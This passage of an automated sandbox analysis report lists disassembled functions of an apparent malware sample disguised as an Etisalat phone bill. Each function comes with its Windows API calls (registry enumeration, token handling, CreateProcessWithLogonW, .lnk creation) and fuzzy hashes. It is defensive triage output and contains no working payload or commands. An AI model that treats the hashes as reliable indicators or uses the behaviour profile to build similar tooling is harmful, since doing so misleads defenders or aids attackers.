Part of subcall function 00923224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0091EC0C), ref: 00923240

_strlen.LIBCMT ref: 00921F35

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: edd4988c57342cc0578acec4d300c4a72ba778f769057a43417eb310725bf4f6
Instruction ID: b43b7f1211f5185c60e97986ea9473df60d1341f2d6e91b7cbb11555faa07eaf
Opcode Fuzzy Hash: edd4988c57342cc0578acec4d300c4a72ba778f769057a43417eb310725bf4f6
Instruction Fuzzy Hash: 87B1E230604310AFD324DF28D881E6A77A9FF95318F58895CF4669B2E2DB31ED41CB92

Function 008A5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 008A5D30
GetWindowRect.USER32(?,?), ref: 008A5D71
ScreenToClient.USER32(?,?), ref: 008A5D99
GetClientRect.USER32(?,?), ref: 008A5ED7
GetWindowRect.USER32(?,?), ref: 008A5EF8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 4079413759e47e5442ad35e57606513046ce0c9eae95cca072f2da6a1bb2cba1
Instruction ID: be24bac2a53c9a92c7f6bda2cb2d8ccf9133e6f731a3266eb4c7e3f2da11ae60
Opcode Fuzzy Hash: 4079413759e47e5442ad35e57606513046ce0c9eae95cca072f2da6a1bb2cba1
Instruction Fuzzy Hash: 23B18A74A00B8ADBDB10CFA9C4807EEB7F1FF59310F14941AE8A9D7650DB30AA90DB50

Function 008D01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008D00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D00D6
__allrem.LIBCMT ref: 008D00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D010B
__allrem.LIBCMT ref: 008D0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D0140

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: ef7e757fa4810399844e21c7b5c4d3d93d70fddccc6b19c433a7dd6890ebf859
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 9081D372A00B06ABEB249A6DCC41B6A73F9FF51364F24422FF551D7382EB70D9008B91

Function 008D61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008C82D9,008C82D9,?,?,?,008D644F,00000001,00000001,8BE85006), ref: 008D6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008D644F,00000001,00000001,8BE85006,?,?,?), ref: 008D62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008D63D8
__freea.LIBCMT ref: 008D63E5

Part of subcall function 008D3820: RtlAllocateHeap.NTDLL(00000000,?,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6,?,008A1129), ref: 008D3852

__freea.LIBCMT ref: 008D63EE
__freea.LIBCMT ref: 008D6413

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 9618f7dd8ebeeda02b0194736ccaf57453a38a056a3672d5d17e2a622b6151f8
Instruction ID: 14579566d660f441a3132bc2caec52cffabba22c130acd126506d6cb2f55c07d
Opcode Fuzzy Hash: 9618f7dd8ebeeda02b0194736ccaf57453a38a056a3672d5d17e2a622b6151f8
Instruction Fuzzy Hash: E851F172A0021AABDB298F64DC81EAF77AAFF44710F15432AFC05D6341EB34DC60D661

Function 0092BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 0092C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0092B6AE,?,?), ref: 0092C9B5
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092C9F1
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA68
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0092BD25
RegCloseKey.ADVAPI32(00000000), ref: 0092BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0092BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0092BDF3
RegCloseKey.ADVAPI32(?), ref: 0092BDFF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: db073b1d8328623c5bf0715dd40d470a77baeeb09199baf17d0842f9c6e9fd43
Instruction ID: 3fabb8e4ee5ef131a61c427be6ba3d488e5d5174bdfa6cf4e920a6f0af2f1280
Opcode Fuzzy Hash: db073b1d8328623c5bf0715dd40d470a77baeeb09199baf17d0842f9c6e9fd43
Instruction Fuzzy Hash: 2C81C370208241EFD714DF24D891E6ABBE9FF85308F14895CF5958B2A2DB31ED45CB92

Function 008FF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 008FF7B9
SysAllocString.OLEAUT32(00000001), ref: 008FF860
VariantCopy.OLEAUT32(008FFA64,00000000), ref: 008FF889
VariantClear.OLEAUT32(008FFA64), ref: 008FF8AD
VariantCopy.OLEAUT32(008FFA64,00000000), ref: 008FF8B1
VariantClear.OLEAUT32(?), ref: 008FF8BB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 3d351a362c487d9fa19d4ffa38fee86ff48f6ae9c9df1af06b7a3d0b7ef4677a
Instruction ID: 7b2a752471a63c5e96030709caf84490e2a4c3a60f103a05ae79a334b9f17bfe
Opcode Fuzzy Hash: 3d351a362c487d9fa19d4ffa38fee86ff48f6ae9c9df1af06b7a3d0b7ef4677a
Instruction Fuzzy Hash: BE51D531610318BADF20AB79D895B39B7A4FF45314B248466EB05DF293DBB08C40DB57

Function 0091910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 008A7620: _wcslen.LIBCMT ref: 008A7625

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009194E5
_wcslen.LIBCMT ref: 00919506
_wcslen.LIBCMT ref: 0091952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00919585

Strings

X, xrefs: 00919412

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 3809bd9b8d984971b6087de40a6f5a3071078d5ecebeb80c3cbd3a56966aa804
Instruction ID: 4fd3a883c718e3b5f5efbaca4be2797a40994b09b0bf7981bd946d7cb067ab30
Opcode Fuzzy Hash: 3809bd9b8d984971b6087de40a6f5a3071078d5ecebeb80c3cbd3a56966aa804
Instruction Fuzzy Hash: 31E1B4316083118FD724DF28C891AAAB7E5FF85314F04896DF8999B3A2DB31DD45CB92

Function 008B920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

BeginPaint.USER32(?,?,?), ref: 008B9241
GetWindowRect.USER32(?,?), ref: 008B92A5
ScreenToClient.USER32(?,?), ref: 008B92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008B92D3
EndPaint.USER32(?,?,?,?,?), ref: 008B9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008F71EA

Part of subcall function 008B9339: BeginPath.GDI32(00000000), ref: 008B9357

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 93a14f5843d7a17c3c1829d1c9190f1b4fd7a619a159a1d4d1de82f59347cfbe
Instruction ID: fc23920d0188a577f6c181f49d0769c4430fe3f7d0e78b4aede35cf3392e5520
Opcode Fuzzy Hash: 93a14f5843d7a17c3c1829d1c9190f1b4fd7a619a159a1d4d1de82f59347cfbe
Instruction Fuzzy Hash: 0641A171108205AFD711DF28DC85FB67BE8FB49324F140229FAA8D72A1C7319885EB62

Function 009107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0091080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00910847
EnterCriticalSection.KERNEL32(?), ref: 00910863
LeaveCriticalSection.KERNEL32(?), ref: 009108DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009108F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00910921

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 91b473f5ea42a1b89351a4e0ff76173b4a908f04a9a422d4d9a2c92bba813d26
Instruction ID: 22f3cdc35975a0d9c9170f5e1afa4e2047e247f0c45923fa9f6d3409f85b4f45
Opcode Fuzzy Hash: 91b473f5ea42a1b89351a4e0ff76173b4a908f04a9a422d4d9a2c92bba813d26
Instruction Fuzzy Hash: 0F415B71A04209EBDF14AF64DC85AAA7779FF44310F1440A9E904EE297D771DEA0DBA0

Function 009381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008FF3AB,00000000,?,?,00000000,?,008F682C,00000004,00000000,00000000), ref: 0093824C
EnableWindow.USER32(00000000,00000000), ref: 00938272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009382D1
ShowWindow.USER32(00000000,00000004), ref: 009382E5
EnableWindow.USER32(00000000,00000001), ref: 0093830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0093832F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: fbffd21d142ead15e4b01476fe9a1a15df7e0a730b26a9abf8c91f965d04dd74
Instruction ID: 6fd1733e5dc063b9052f41e01a17192b7bca2a08036174d1366cf32badf60d77
Opcode Fuzzy Hash: fbffd21d142ead15e4b01476fe9a1a15df7e0a730b26a9abf8c91f965d04dd74
Instruction Fuzzy Hash: C041D331605740AFDB25CF18DC99BE67BE4FB0A754F1801A8FA184B2A2CB31A842DF40

Function 00904C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00904C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00904CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00904CEA
_wcslen.LIBCMT ref: 00904D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00904D10
_wcsstr.LIBVCRUNTIME ref: 00904D1A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 6c3d3e9322ab131e643a8463b1149f713cf82f51ff1213704006cf57d8184a19
Instruction ID: 811c6e4aa299783eff0896eba5c88739f6ea4bbf3a84d99d0acdb0d2538a03b9
Opcode Fuzzy Hash: 6c3d3e9322ab131e643a8463b1149f713cf82f51ff1213704006cf57d8184a19
Instruction Fuzzy Hash: D32129B22042117FEB155B399C0AE7B7BACEF45750F10402DFA05DA1D2DA71DC0097A1

Function 0091581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 008A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008A3A97,?,?,008A2E7F,?,?,?,00000000), ref: 008A3AC2

_wcslen.LIBCMT ref: 0091587B
CoInitialize.OLE32(00000000), ref: 00915995
CoCreateInstance.OLE32(0093FCF8,00000000,00000001,0093FB68,?), ref: 009159AE
CoUninitialize.OLE32 ref: 009159CC

Strings

.lnk, xrefs: 00915876, 009158C1, 00915985

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: d71bb35a748808087772e34501fdd2e4583bb815c49ae21d0b015cfbf7c51bd9
Instruction ID: 4b1c7c87e9f9f214b7baa4158c5643c133d28abd208335d922b795e05293d2ef
Opcode Fuzzy Hash: d71bb35a748808087772e34501fdd2e4583bb815c49ae21d0b015cfbf7c51bd9
Instruction Fuzzy Hash: F2D16471608605DFC714DF18C480A6ABBE5FF89714F16885DF88A9B361DB31EC85CB92

Function 0090175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00900FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00900FCA
Part of subcall function 00900FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00900FD6
Part of subcall function 00900FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00900FE5
Part of subcall function 00900FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00900FEC
Part of subcall function 00900FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00901002

GetLengthSid.ADVAPI32(?,00000000,00901335), ref: 009017AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009017BA
HeapAlloc.KERNEL32(00000000), ref: 009017C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009017DA
GetProcessHeap.KERNEL32(00000000,00000000,00901335), ref: 009017EE
HeapFree.KERNEL32(00000000), ref: 009017F5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 8c4d4dd50dbdaeee60e0d7d5a17f539c03e28f6dcc0dc38ac892fa7246c5e120
Instruction ID: 5f0ad9d64192912d14d1a78049685444457ffa69a37434b136ebb23ca6dfe3a6
Opcode Fuzzy Hash: 8c4d4dd50dbdaeee60e0d7d5a17f539c03e28f6dcc0dc38ac892fa7246c5e120
Instruction Fuzzy Hash: 1411BB72618605FFDB149FA4CC49BAF7BEDEB46355F104018F481A7290C736A940EF60

Function 009014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009014FF
OpenProcessToken.ADVAPI32(00000000), ref: 00901506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00901515
CloseHandle.KERNEL32(00000004), ref: 00901520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0090154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00901563

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: ede2967bc3aee6f6579259262eb4090a06de5d112c9e8615145f39a64ecd87d1
Instruction ID: 3e3950938c569fa3931691b6e672503f3b9f3aea4bb572b5eb1d92cd020f4c0e
Opcode Fuzzy Hash: ede2967bc3aee6f6579259262eb4090a06de5d112c9e8615145f39a64ecd87d1
Instruction Fuzzy Hash: 401126B2604249EFDF118FA8DD49BDE7BADEF48748F044025FA05A20A0C3758E64EB60

Function 008C3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008C3379,008C2FE5), ref: 008C3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008C339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008C33B7
SetLastError.KERNEL32(00000000,?,008C3379,008C2FE5), ref: 008C3409

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 01ef60f5077909088d8263a911faecceed53d5b1251fe439a2cefd90c7b6dd22
Instruction ID: ec98d23145acf024dcbf4d652b570b714672c0100b4a607b24eefae11c8c56c6
Opcode Fuzzy Hash: 01ef60f5077909088d8263a911faecceed53d5b1251fe439a2cefd90c7b6dd22
Instruction Fuzzy Hash: EC01DE7221C311BAAA2427787C95F662AB4FB25379720822EF410C12F0EE71CD037688

Function 008D2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008D5686,008E3CD6,?,00000000,?,008D5B6A,?,?,?,?,?,008CE6D1,?,00968A48), ref: 008D2D78
_free.LIBCMT ref: 008D2DAB
_free.LIBCMT ref: 008D2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,008CE6D1,?,00968A48,00000010,008A4F4A,?,?,00000000,008E3CD6), ref: 008D2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,008CE6D1,?,00968A48,00000010,008A4F4A,?,?,00000000,008E3CD6), ref: 008D2DEC
_abort.LIBCMT ref: 008D2DF2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

